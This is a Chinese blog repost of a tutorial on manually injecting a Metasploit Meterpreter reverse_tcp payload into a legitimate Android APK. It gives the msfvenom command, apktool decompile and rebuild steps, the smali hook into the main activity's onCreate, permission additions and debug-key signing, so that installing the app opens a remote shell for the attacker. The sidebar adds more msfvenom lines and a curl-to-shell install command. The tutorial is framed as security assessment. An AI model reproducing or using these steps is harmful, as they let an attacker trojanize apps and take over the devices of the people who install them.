android 进程注入,【技术分享】如何手动将Metasploit的Payloads注入到Android应用中

最新推荐文章于 2024-01-18 16:09:02 发布
最新推荐文章于 2024-01-18 16:09:02 发布
阅读量633 收藏 4
点赞数
文章标签: android 进程注入

86353

预估稿费:100RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

写在前面的话

现在目前绝大多数的安卓应用程序都缺乏源代码级别的安全保护,因此这也意味着攻击者可以轻而易举地向一个合法安卓应用程序中植入木马病毒或注入恶意Payload,这也是导致安卓端恶意软件传播如此迅猛的其中一个原因。

在移动安全评估领域中,如果企业推向市场的应用程序被证明可以被轻易植入木马或恶意代码的话,不仅企业的声誉会受到影响,而且还会严重打击消费者对其的购买信心。

在我们之前所发表的一篇文章中,我们给大家介绍了如何利用脚本将Metasploit的Payloads注入到安卓应用程序之中,感兴趣的同学可以参阅这篇文章【文章链接】。那么在这篇文章中,我们将跟大家讨论如何手动将Metasploit的Payloads注入到安卓应用程序之中。

第一步:Payload生成

Metasploit MsfVenom不仅可以帮助我们生成各种类型的Payload,而且它还可以生成一种包含有Meterpreter Payload的APK文件。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.169

LPORT=4444 R > pentestlab.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 8839 bytes

下图显示的是我们通过Metasploit生成APK Payload的过程:

86353

第二步:反编译APK文件

在针对目标安卓应用注入Payload并生成最终的恶意文件pentestlab.apk之前,我们首先需要对原本的APK安装文件进行反编译。在这一步骤中,我们需要使用到强大的反编译工具apktool。下面给出的代码可以帮助我们利用apktool来对原本的APK文件进行反编译,并将代码保存至.smali文件中。

java -jar apktool.jar d -f -o payload /root/Downloads/pentestlab.apk

I: Using Apktool 2.2.2 on pentestlab.apk

I: Loading resource table...

I: Decoding AndroidManifest.xml with resources...

I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk

I: Regular manifest package...

I: Decoding file-resources...

I: Decoding values */* XMLs...

I: Baksmaling classes.dex...

I: Copying assets and libs...

I: Copying unknown files...

I: Copying original files...

下图显示的是我们使用apktool反编译APK文件的过程:

86353

第三步:转移Payload文件

完成上述操作之后,我们需要将恶意程序pentestlab.apk中的Payload文件拷贝到smali文件夹之中,即保存了应用程序所有源代码的文件夹内。尤其需要注意的是下面给出的这两个文件目录:

/root/Downloads/payload/smali/com/metasploit/stage

/root/Downloads/original/smali/com/metasploit/stage

第四步:注入钩子(Hook)

接下来,我们需要对Android manifest文件进行分析,这样才能帮助我们确定当应用程序开始运行时哪一个才是首先启动的Main Activity。这一步是必须要做的,否则将有可能导致我们的Payload无法正常执行。

下图演示了如何识别目标安卓应用的Main Activity:

86353

接下来,用下面给出的这行代码替换Main Activity文件中的相关代码,具体如下图所示:

;->onCreate(Landroid/os/Bundle;)V

识别需要替换的代码:

86353

当目标Activity启动之后,下面的代码将会执行Metasploit的Payload:

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

注入Hook:

86353

第五步:获取应用程序额外权限

为了让我们所注入的Payload能够更加高效地执行,我们需要向Android Manifest文件中为我们的恶意应用程序添加额外的执行权限,如果用户接受了这些权限请求,那么我们的恶意程序将有可能完全接管目标设备。

添加额外的安卓权限:

86353

第六步:重新编译应用程序

既然现在我们已经将Payload和额外权限都添加到目标应用程序之中了,那么接下来我们就要将这些代码重新编译成APK文件。编译命令如下:

java -jar apktool.jar b /root/Downloads/original/

编译注入了恶意Payload的APK文件:

86353

第七步:对生成的APK文件进行签名

应用程序如果没有进行签名的话是无法在安卓设备上安装的,这里我们可以直接使用默认的安卓调试密钥(Android Debug Key)来对刚才所生成的恶意APK文件进行签名。签名命令如下:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA /root/Downloads/original/dist/target.apk androiddebugkey

对APK文件进行签名:

86353

当我们的恶意应用程序在目标设备上成功安装并运行之后,将会自动开启一个Meterpreter会话。

通过注入恶意Payload的安卓APK文件实现Meterpreter会话:

86353

一如原来
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
进程注入方法详细介绍
Sumarua的博客
07-01 111
进程注入是一种技术,攻击者将恶意代码注入到合法的系统进程运行。这种方法可以使恶意代码看起来像是合法进程的一部分,从而逃避安全软件的检测。通过注入合法进程,攻击者可以利用该进程的权限,并在系统隐蔽存在。
Metasploit SQL注入漏洞渗透测试实战
悦分享
12-07 1050
现代化Web应用程序在设计时都会将代码与数据进行分离,这些数据会独立保存在服务器。当数据量较大的时候,需要使用一种特殊的数据管理程序,也就是常说的数据库。目前比较常用的数据库软件有MySQL、SQLServer、Access等,不过它们的操作都要遵循SQL(Structured Query Language,结构化查询语言)标准,但是不同的产品之间存在着一定的差别。SQL注入攻击是通过操作输入来修改SQL语句,以达到执行代码对Web服务器进行攻击的方式。
payload注入android APK教程
Johnathan的博客
02-26 1391
参考了网络很多大神文章,简单小结一下,仅供参考 1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk 2,apktook反编译virus.apk和normal.apk 3,找normal.apk入口,normal.apk的androidManifest.xml文件查找MainActivety和Launch关键词,定位到所对应的启动smail文件搜索Main和Launch关键词 4,找到com/b.
手动地在安卓apk嵌入Payload
QQ_1519938366的博客
02-12 544
信息安全、木马、Payload 嵌入、安卓 apk 安全
Metasploit 线程代码注入工具
热门推荐
CSDN
07-05 1万+
前段时间,本人实现过一款远程ShellCode注入器,但由于实现的比较仓促所以在参数解析上只是简单的传递非常的难以记忆和使用,今天借着有时间我将程序的参数进行了规范化,以及分类,不同的分类功能放在不同的位置,使用起来能更加清晰。 该工具主要用于后渗透使用,当我们拿到目标主机的权限时,可以直接将该工具传输到对端并在命令行下执行注入命令,如果是服务器那么多半常年不关机,这样使用进程注入功能将Meta...
使用Metasploit进程注入绕过文档加密限制
weixin_43853965的博客
02-03 1125
在了解了它的工作机制后,我开始设想,既然合法程序可以解密,那么假如将另一个伪程序注入到这个合法程序的进程,那么这个伪程序是否就可以解密文件,然后再用伪程序对文件进行操作。最好这个伪程序还不在这个安装有加密客户端的操作系统上。要实现这种效果,我第一时间想到了大名鼎鼎的Metasploit
【EXP】利用powersploit实现进程注入
KANITAN___的博客
10-10 583
实验内容 实验名称 利用powersploit实现进程注入 实验环境 靶机:windows7,主机名target 攻击机: 宿主机:macOS,主机名host 虚拟机:kali,主机名vmhost 使用工具: metasploit:制作木马 apache2:提供下载 powersploit:进程注入工具 Parallels Desktop:虚拟机 解决问题 (1) 将...
深入理解Metasploit Payloads原理与优化
Payloads是Metasploit的一项关键功能,用于在攻击者与受害者之间传输和执行恶意代码。通过Payloads,攻击者可以实现对目标系统的控制、数据窃取、文件执行等操作。 1.3 Payloads的分类及功能 Payloads根据其功能...
android-metasploit:修改当前的metasploit-javapayload,在payload前面包含一个“小游戏”,用于演示目的
06-30
打包所有文件并将它们复制到 Metasploit 的正确位置( ../metasploit-framework/data/java )。 如果您遇到虚假编译错误,请确保您的防病毒软件有针对 Metasploit 目录的排除规则(或者您的防病毒软件已禁用)。 ...
metasploit_in_termux:在Termux安装Metasploit Framework 6
05-02
TermuxMetasploit Framework 6 如何: 汽车 source <( curl -fsSL https://kutt.it/msf ) 手动的 pkg install wget wget ...
extract_android_payload
03-16
extract_android_payload 从OTA payload.bin文件提取Android固件映像。 不支持增量固件映像 extract_android_payload.py-用于从payload.bin提取分区图像的命令行工具 usage: extract_android_payload.py [-h] {extract,list} ... 位置参数: {extract,list} List of commands 可选参数: -h, --help show this help message and exit 例子 # python extract_android_payload.py extract -p system_ext payload.bin /tmp/ Extracting system_ext.img # python extrac
安卓后门手动注入
钻石
02-18 5658
#首先申明:随意修改别人软件是违法行为,本文只用于学术研究,不得用于非法用途,后果自负,与本人无关      前面讲过kali如何生成apk木马渗透安卓,有个问题就是生成的软件无正常功能,且没有图标、单机没有任何反应,别人一看就知道是木马,当然也可以修改apk图标,我上次修改成qq图标了,思路是:先用Androidkiller反编译得到源代码,然后将源代码导入eclipse(或其他编程软件)重...
Android OTA 相关工具(四) 查看 payload 文件信息
洛奇看世界
02-26 4859
一直以来,很多人都表达过很想去研究一下 Android OTA 的 payload 文件,看看里面到底有什么,想对其进行一番研究操作,但又觉得 payload 文件很复杂,最终望而却步。从 Android 10(Q) 的动态分区开始,update_engine 的代码新增了一个名为 payload_info.py 的脚本,专门用于解析 payload.bin 文件并显示相关信息。有了这个工具,我觉得你应该不需要再对 payload.bin 文件内容发愁了。
Android Update Engine分析(十四) 生成 payload 数据
洛奇看世界
01-30 3284
生成 payload 数据是 `delta_generator` 工具最主要的功能,当我准备重新更新这一些列文章时,一开始就想写这个的,不过因为太久没看,不记得 payload 细节了,更无从从细节上分析。所以就先写一些简单的操作,等熟悉了再开始写。经过前面篇的分析了解 payload 结构,现在是时候来解决这个问题了。
Android A/B System OTA分析(六)如何获取 payload 的 offset 和 size
qq_42135379的博客
01-18 1159
1. 从 Android 8.0 (O) 开始,制作升级包时会同时将 offset 和 size 信息输出到 META-INF/com/android/metadata 文件。具体的分析请参考 2.2 节。3. 使用这里提供的 python3 工具计算 update.zip 包内各数据的 offset 和 size 信息具体的代码和样例输出,参考 2.3 节。
msfvenom生成apk payload然后得到meterpreter shell
公众号shadow sock7
11-15 4434
先生成一个payload,带上meterpreter监听的地址和端口: msfvenom -p android/meterpreter/reverse_tcp LHOST=&amp;amp;amp;lt;your public IP&amp;amp;amp;gt; LPORT=80 -o msf.apk 由于大号端口在我的wifi环境下无法出去,所以这里我设置为80端口。 然后安装这个apk到手机。 然后在msf上: use exploit/...
2006-2021 国各地万达广场地理分布数据.zip
最新发布
09-03
万达广场是城市综合体及其公共空间的主要实践者,在有利于城市综合体的发展的背景下,各地房地产的业务将向城市综合体方向倾向,如万达、粮等国内知名房地产集团。万达集团是较早进入商业地产开发的企业,具有成熟的模式、完善的产业链、丰富的商业资源及运营能力。万达广场从2002年开始在全国各地开发和发展,是城市综合体及其公共空间实践的主力。 万达广场内容包括大型商业心、商业步行街、五星级酒店、写字楼、公寓等,集购物、餐饮、文化、娱乐等多种功能于一体,形成独立的大型商圈。 万达广场是企业效益和社会效益的和谐统一,产生四大社会效益:提升城市商业档次、新增大量就业岗位、创造持续巨额税收、丰富群众消费需求。 数据指标 项目名称、项目信息、地点、开业时间、商业面积、经度、纬度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值